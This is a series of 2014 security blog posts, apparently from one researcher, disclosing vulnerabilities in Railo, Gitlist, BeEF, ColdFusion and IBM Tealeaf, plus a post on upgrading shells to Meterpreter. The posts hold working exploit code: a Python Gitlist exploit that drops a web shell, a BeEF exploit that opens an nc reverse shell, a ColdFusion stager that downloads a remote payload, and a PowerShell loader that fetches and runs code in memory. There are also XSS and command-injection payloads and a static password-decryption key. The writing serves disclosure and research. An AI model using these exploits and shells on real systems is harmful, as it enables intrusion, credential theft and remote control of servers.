Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:

public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {

    try {
        if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}

Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:

private static void loadId(ConfigImpl config) {
        Resource res = config.getConfigDir().getRealResource("id");
        String securityKey = null;
        try {
            if (!res.exists()) {
                res.createNewFile();
                IOUtil.write(res, securityKey = UUIDGenerator.getInstance().generateRandomBasedUUID().toString(), SystemUtil.getCharset(), false);
            }
            else {
                securityKey = IOUtil.toString(res, SystemUtil.getCharset());
            }
        }

Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.

The second value we need to calculate is the security token, which is set in ConfigImpl:

public String getSecurityToken() {
        if(securityToken==null){
            try {
                securityToken = Md5.getDigestAsString(getConfigDir().getAbsolutePath());
            }
            catch (IOException e) {
                return null;
            }
        }
        return securityToken;
    }

Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo So let’s see if this works.

We MD5 the directory (20132193c7031326cab946ef86be8c74), then prefix this with the random UUID (securityKey) to finally get:

1 2	`$ echo -n "3ec59952-b5de-4502-b9d7-e680e5e2071820132193c7031326cab946ef86be8c74" \| md5sum a898c2525c001da402234da94f336d55 -`

Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:

I mentioned that the config directory is leaked; default Railo is pretty promiscuous:

As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.

There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:

When we then access a non-existant page, we trigger the template and the system returns our file:

By combining these specific vectors and inherit weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:

I mentioned briefly at the start of this post that there were “several” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:

Here we’re building an HTML layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. The file is not created once you create the log, but once you select Edit and then Submit for some reason. Here’s the HTML output that’s, by default, stuck into the file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><cfdump var="#session#"></title>
<style type="text/css">
<!--
body, table {font-family: arial,sans-serif; font-size: x-small;}
th {background: #336699; color: #FFFFFF; text-align: left;}
-->
</style>
</head>
<body bgcolor="#FFFFFF" topmargin="6" leftmargin="6">
<hr size="1" noshade>
Log session start time Mon Jun 30 23:06:17 MDT 2014<br>
<br>
<table cellspacing="0" cellpadding="4" border="1" bordercolor="#224466" width="100%">
<tr>
<th>Time</th>
<th>Thread</th>
<th>Level</th>
<th>Category</th>
<th>Message</th>
</tr>
</table>
<br>
</body></html>

Note our title contains the injected command. Here’s execution:

Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.

Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:

With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.

Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.

gitlist - commit to rce

http://dronesec.pw/

By: Bryan Alexander

29 June 2014 at 22:00

Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features of it. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:

1	`Oops! sh: 1: Syntax error: EOF in backquote substitution`

I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.

The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:

1	$hash = $this->getClient()->run($this, "log --pretty=\"%T\" --max-count=1 $branch");```

This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.

The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):

Cannot begin with .
Cannot have a double dot (..)
Cannot contain ASCII control characters (?, [, ], ~, ^, :, \)
End with /
End with .lock
Contain a backslash
Cannot contain a space

With these restrictions in mind, we can begin crafting our payload.

My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:

1
2
3

cd /var/www/gitlist
mkdir cache
chmod 777 cache

This is perfect; we have a reliable location with 777 permissions and it’s accessible from the web root (/gitlist/cache/my_shell.php). Second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:

1	`# git checkout -b "\|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"\|base64\$IFS-d>/var/www/gitlist/cache/x"`

In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to plug in our spaces and echo the base64’d shell into base64 for decoding, then pipe that into our payload location.

And it works flawlessly.

Though you might say, “Hey if you have commit access it’s game over”, but I’ve seen several instances of this not being the case. Commit access does not necessarily equate to shell access.

The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:

1	`$blames = $repository->getBlame("$branch -- \"$file\"");`

Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:

1	http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

And what do you know?

Curiousity quickly overcame me, and I attempted another vector:

Faster my fingers flew:

It’s terrifyingly clear that everything is an RCE. I developed a rough PoC to drop a web shell on the system. A test run of this is below:

root@droot:~/exploits# python gitlist_rce.py http://192.168.1.67/gitlist/graymatter
[!] Using cache location /var/www/gitlist/cache
[!] Shell dropped; go hit http://192.168.1.67/gitlist/cache/x.php?cmd=ls
root@droot:~/exploits# curl http://192.168.1.67/gitlist/cache/x.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@droot:~/exploits#

I’ve also developed a Metasploit module for this issue, which I’ll be submitting a PR for soon. A run of it:

msf exploit(gitlist_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.6:4444 
[*] Injecting payload...
[*] Executing payload..
[*] Sending stage (39848 bytes) to 192.168.1.67
[*] Meterpreter session 9 opened (192.168.1.6:4444 -> 192.168.1.67:34241) at 2014-06-21 23:07:01 -0600

meterpreter > sysinfo
Computer    : bryan-VirtualBox
OS          : Linux bryan-VirtualBox 3.2.0-63-generic #95-Ubuntu SMP Thu May 15 23:06:36 UTC 2014 i686
Meterpreter : php/php
meterpreter >

Source for the standalone Python exploit can be found below.

from commands import getoutput
import urllib
import sys

""" 
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Tested on: Debian 7
More information: 
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

http://dronesec.pw/
railo security - part one - introBryan Alexander
25 June 2014 at 21:00

railo security - part one - intro

http://dronesec.pw/

By: Bryan Alexander

25 June 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, mainly features coming straight from the CF world, along with several of it’s own unique features (clustered servers, a plugin architecture, etc). In this four-part series, we’ll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).

I’ll preface this post with a quick rundown on what we’re working with; public versions of Railo run from versions 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; much of this post’s code samples have been taken from the 4.2 branch or the master. Hashes:

$ git branch
* master
$ git rev-parse master
694e8acf1a762431eab084da762a0abbe5290f49

And a quick rundown of the code:

$ cloc ./
    3689 text files.
    3571 unique files.                                          
     151 files ignored.

http://cloc.sourceforge.net v 1.60  T=7.74 s (452.6 files/s, 60622.4 lines/s)
---------------------------------------------------------------------------------
Language                       files          blank        comment           code
---------------------------------------------------------------------------------
Java                            2786          66639          69647         258015
ColdFusion                       315           5690           3089          35890
ColdFusion CFScript              352           4377            643          15856
XML                               22            526            563           5773
Javascript                        14             46            252            733
Ant                                4             38             70            176
DTD                                4            283            588            131
CSS                                5             52             16             77
HTML                               1              0              0              1
---------------------------------------------------------------------------------
SUM:                            3503          77651          74868         316652
---------------------------------------------------------------------------------

Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.

Authentication

As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):

1
2
3

<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
        <cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
    <cfelse>

A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:

1	`<cfcookie expires="#DateAdd(form.rememberMe,1,now())#" name="railo_admin_pw_#ad#" value="#Encrypt(form["login_password"&ad],cookieKey,"CFMX_COMPAT","hex")#">`

That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric key security is dependant upon the secrecy of this shared key.

To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):

<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
    <cfset fromCookie=true>
    <cftry>
        <cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
        <cfcatch></cfcatch>
    </cftry>
</cfif>

For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:

1 2	`<cfset tmp=Decrypt("6802AABFAA87A7", "sdfsdf789sdfsd", "CFMX_COMPAT", "hex")> <cfdump var="#tmp#">`

This would dump my plaintext password (which, in this case, is “default”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT._

Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:

1	`<cfset session["password"&request.adminType]=form["login_password"&request.adminType]>`

In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:

1	`<cfdump var="#session#">`

We then set the template handler to this file:

If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:

XSS

XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?

Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.

Post-authentication search:

Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.

How about stored XSS?

A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.

Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:

1
2
3

  public static final String[] invalids=new String[]{
        "object", "embed", "script", "applet", "meta", "iframe"
    };

They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:

if(compareTagName(tagName)) {
            if(sb==null) {
                sb=new StringBuffer();
                last=0;
            }
            sb.append(str.substring(last,index+1));
            sb.append("invalidTag");
            last=endIndex;
        }

It doesn’t take much to evade this filter, as I’ve already described.

CSRF kinda fits in here, how about CSRF? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:

In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.

Deploying

Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:

$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
 [2014-05-01 10:04PM] Servers' OS hinted at windows
 [2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
 [2014-05-01 10:04PM] Server hinted at 'railo'
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-05-01 10:04PM] Matched 3 fingerprints for service railo
 [2014-05-01 10:04PM]   Railo Server (version 4.1)
 [2014-05-01 10:04PM]   Railo Server Administrator (version 4.1)
 [2014-05-01 10:04PM]   Railo Web Administrator (version 4.1)
 [2014-05-01 10:04PM] Fingerprinting completed.
 [2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
 [2014-05-01 10:04PM] Creating scheduled task...
 [2014-05-01 10:04PM] Task cmd.cfml created, invoking...
 [2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
 [2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
 [2014-05-01 10:04PM] Cleaning up...
 [2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM

This works almost identically to the Coldfusion scheduler, and should not be surprising.

One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.

Railo allows extensions to be uploaded directly to the server, found here:

Developing a plugin is sort of confusing and not exacty clear via their provided Github documentation, however the simplest way to do this is grab a pre-existing package and simply replace one of the functions with a shell.

That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.

http://dronesec.pw/
rce in browser exploitation framework (BeEF)Bryan Alexander
14 May 2014 at 02:57

rce in browser exploitation framework (BeEF)

http://dronesec.pw/

By: Bryan Alexander

14 May 2014 at 02:57

Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03022014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.

The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.

The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:

# Adds a new DNS rule
        post '/rule' do
          begin
            body = JSON.parse(request.body.read)

            pattern = body['pattern']
            type = body['type']
            response = body['response']

            # Validate required JSON keys
            unless [pattern, type, response].include?(nil)
              # Determine whether 'pattern' is a String or Regexp
              begin

                pattern_test = eval pattern
                pattern = pattern_test if pattern_test.class == Regexp
   #             end
              rescue => e;
              end

The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:

import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code is 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'

    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'

    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ]
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e

You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).

There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:

def run_lfi(ip, token):
    url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
    headers = { 'Content-Type' : 'application/json'}
    data = { 'mount' : "/tmp.txt",
             'local_file' : "/../../../etc/passwd"
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code

We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.

http://dronesec.pw/
LFI to shell in Coldfusion 6-10Bryan Alexander
2 April 2014 at 21:10

LFI to shell in Coldfusion 6-10

http://dronesec.pw/

By: Bryan Alexander

2 April 2014 at 21:10

ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?

The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.

Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as example. CF8’s LFI lies in the locale parameter:

1	`http://192.168.1.219:8500/CFIDE/administrator/enter.cfm?local=../../../../../../../../ColdFusion8\logs\application.log%00en`

When exploited, this will dump the contents of application.log, a logging file that stores error messages.

We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any sort of characters we want; including CFML code.

The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:

1	`<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>`

The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../ which drops us into wwwroot, which is the first directory accessible from the web server.

Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:

Which we can then access from the root directory:

A quick run of this in clusterd:

$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml 

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 5 platforms]

 [2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
 [2014-04-02 11:28PM] Servers' OS hinted at windows
 [2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
 [2014-04-02 11:28PM] Server hinted at 'coldfusion'
 [2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
 [2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
 [2014-04-02 11:28PM]   ColdFusion Manager (version 8.0)
 [2014-04-02 11:28PM] Fingerprinting completed.
 [2014-04-02 11:28PM] Injecting stager...
 [2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
 [2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
 [2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM

The downside to this method is remnance in a log file, which cannot be purged unless the CF server is shutdown (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand, that is, check if an argument is provided to the LFI and only parse and execute then.

A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.

http://dronesec.pw/
IBM Tealeaf CX (v8 Release 8) Remote OS Command Injection / LFIBryan Alexander
27 March 2014 at 05:51

IBM Tealeaf CX (v8 Release 8) Remote OS Command Injection / LFI

http://dronesec.pw/

By: Bryan Alexander

27 March 2014 at 05:51

Tealeaf Technologies was purchased by IBM in May of 2012, and is a customer buying analytics application. Essentially, an administrator will configure a Tealeaf server that accepts analytic data from remote servers, which it then generates various models, graphs, reports, etc based on the aggregate of data. Their analytics status/server monitoring application is vulnerable to a fairly trivial OS command injection vulnerability, as well as local file inclusion. This vulnerability was discovered on a PCI engagement against a large retailer; the LFI was used to pull PHP files and hunt for RCE.

The entire application is served up by default on port 8080 and is developed in PHP. Authentication by default is disabled, however, support for Basic Auth appears to exist. This interface allows administrators access to statistics, logs, participating servers, and more. Contained therein is the ability to obtain application logs, such as configuration, maintenance, access, and more. The log parameter is vulnerable to LFI:

if(array_key_exists("log", $params))
$path = $config->logfiledir() . "/" . $params["log"];


$file = basename($path);
$size = filesize($path);

// Set the cache-control and expiration date so that the file expires
// immediately after download.
//
$rfc1123date = gmdate('D, d M Y H:i:s T', 1);
header('Cache-Control: max-age=0, must-revalidate, post-check=0, pre-check=0');
header("Expires: " . $rfc1123date);

header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$file;");
header("Content-Length: $size;");

readfile($path);

The URL then is http://host:8080/download.php?log=../../../etc/passwd

Tealeaf also suffers from a rather trivial remote OS command injection vulnerability. Under the Delivery tab, there exists the option to ping remote servers that send data back to the mothership. Do you see where this is going?

if ($_POST["perform_action"] == "testconn") {
    $host = $_POST["testconn_host"];
    $port = $_POST["testconn_port"];
    $use_t = strtolower($_POST["testconn_t"]) == "true" ? true : false;
    $command = $GLOBALS["config"]->testconn_program() . ' ';
    if($use_t)
    $output = trim(shell_command_output($command . $host . " -p " . $port . " -t"));
    else
    $output = trim(shell_command_output($command . $host . " -p " . $port));

    if($output != "") {
        $alert_function = "alert('" . str_replace("\n", "\\n",
        htmlentities($output, ENT_QUOTES)) . "')";
    }

    $_SESSION['delivery']->pending_changes = $orig_pending_changes;
}

And shell_command_output:

function shell_command_output($command) {
    $result = `$command 2>&1`;
    if (strlen($result) > 0)
    return $result;
}

Harnessing the $host variable, we can inject arbitrary commands to run under the context of the process user, which by default is ctccap. In order to exploit this without hanging processes or goofing up flow, I injected the following as the host variable: 8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1.

Timeline

11/08/2013: IBM vulnerability submitted
11/09/2013: IBM acknowledge vulnerability and assign internal advisory ID
12/05/2013: Request for status update
01/06/2014: Second request for status update
01/23/2014: IBM responds with a target patch date set for “another few months”
03/26/2014: IBM posts advisory, assigns CVE-2013-6719 and CVE-2013-6720

Advisory
exploit-db PoC

http://dronesec.pw/
meterpreter shell upgrades using powershellBryan Alexander
11 March 2014 at 04:31

meterpreter shell upgrades using powershell

http://dronesec.pw/

By: Bryan Alexander

11 March 2014 at 04:31

One of my primary goals during development of clusterd was ensuring reliability and covertness during remote deploys. It’s no secret that antivirus routinely eats vanilla meterpreter shells. For this, the --gen-payload flag generates a war file with java/jsp_shell_reverse_tcp tucked inside. This is used due to it being largely undetected by AV, and our environments are perfectly suited for it. However, Meterpreter is a fantastic piece of software, and it’d be nice to be able to elevate from this simple JSP shell into it.

Metasploit has a solution for this, sort of. sessions -u can be used to upgrade an existing shell session into a full-blown Meterpreter. Unfortunately, the current implementation uses Rex::Exploitation::CmdStagerVBS, which writes the executable to disk and executes it. This is almost always immediately popped by most enterprise-grade (and even most consumer grade) AV’s. For this, we need a new solution.

The easiest solution is Powershell; this allows us to execute shellcode completely in-memory, without ever bouncing files against disk. I used Obscure Security’s canonical post on it for my implementation. The only problem really is portability, as Powershell doesn’t exist on Windows XP. This could be mitigated by patching in shellcode via Java, but that’s another post for another time.

Right, so how’s this work? We essentially execute a Powershell command in the running session (our generic shell) that fetches a payload from a remote server and executes it. Our payload in this case is Invoke-Shellcode, from the PowerSploit package. This bit of code will generate our reverse HTTPS meterpreter shell and inject it into the current process ID. Our command looks like this:

1	`cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc %s"`

Our encoded payload is:

1	`iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')`

IEX, or Invoke-Expression, is just an eval operation. In this case, we’re fetching a URL and executing it. This is a totally transparent, completely in-memory solution. Let’s have a look at it running:

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information                                                                       Connection
  --  ----         -----------                                                                       ----------
  1   shell linux  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  192.168.1.6:4444 -> 192.168.1.102:60911 (192.168.1.102)

msf exploit(handler) >

We see above that we currently have a generic shell (it’s the java/jsp_shell_reverse_tcp payload) on a Windows 7 system (which happens to be running MSE). Using this new script, we can upgrade this session to Meterpreter:

msf exploit(handler) > sessions -u 1

[*] Started HTTPS reverse handler on https://0.0.0.0:53568/
[*] Starting the payload handler...
[*] 192.168.1.102:60922 Request received for /INITM...
[*] 192.168.1.102:60922 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 2 opened (192.168.1.6:53568 -> 192.168.1.102:60922) at 2014-03-11 23:09:36 -0600
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
